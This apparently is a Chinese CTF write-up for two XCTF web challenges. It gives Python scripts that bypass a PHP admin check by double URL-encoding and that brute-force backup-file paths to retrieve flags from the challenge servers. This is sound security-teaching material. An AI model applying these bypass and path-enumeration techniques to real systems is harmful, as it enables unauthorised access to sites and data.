攻防世界——PHP2

 打开题目场景,得到如下界面

法一:

在url后面添加index.phps发现代码泄露,查看网页源码,审计代码,首先不能admin等于get传过来的值,又要使admin等于get传值在get传值之前有一个urldecode函数构造payload,得到flag

 

法二:python脚本编写

 

import requests
from urllib.parse import quote

url='http://61.147.171.105:52593/index.php?id='
encoded_id=''.join('%'+hex(ord(c))[2:] for c in 'admin')
encoded_id2=''. join('%'+hex(ord(c))[2:] for c in encoded_id)
target_url =url + encoded_id2
print(target_url)
response = requests.get(target_url)

if 'cyberpeace{' in response.text:
    flag_start=response.text.index("cyberpeace{")
    key_end =response.text.index('}',flag_start)+1
    flag=response.text[flag_start:key_end]
    print("存在 flag:"+flag)
else:
     print("未找到 flag")

 打开题目场景得到如下界面:

 法一:常见的备份文件后缀名有: .git .svn .swp .svn .~ .bak .bash_history,逐个试发flag

法二:编写python脚本

 

import requests

url = 'http://61.147.171.105:49902/'
dictionary = 'php.txt'
with open(dictionary, "r") as file:
    paths = file.read().splitlines()
for path in paths:
    target_url = url + path
    response = requests.get(target_url)

    if"Cyberpeace{"in response.text:
        flag_start=response.text.index("Cyberpeace")
        flag_end = response.text.index('}', flag_start) + 1
        flag = response.text[flag_start:flag_end]
        print("路径爆破成功:"+target_url)
        print("flag:" + flag)
        break
    else:
        print("路径爆破失败,未找到flag")

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值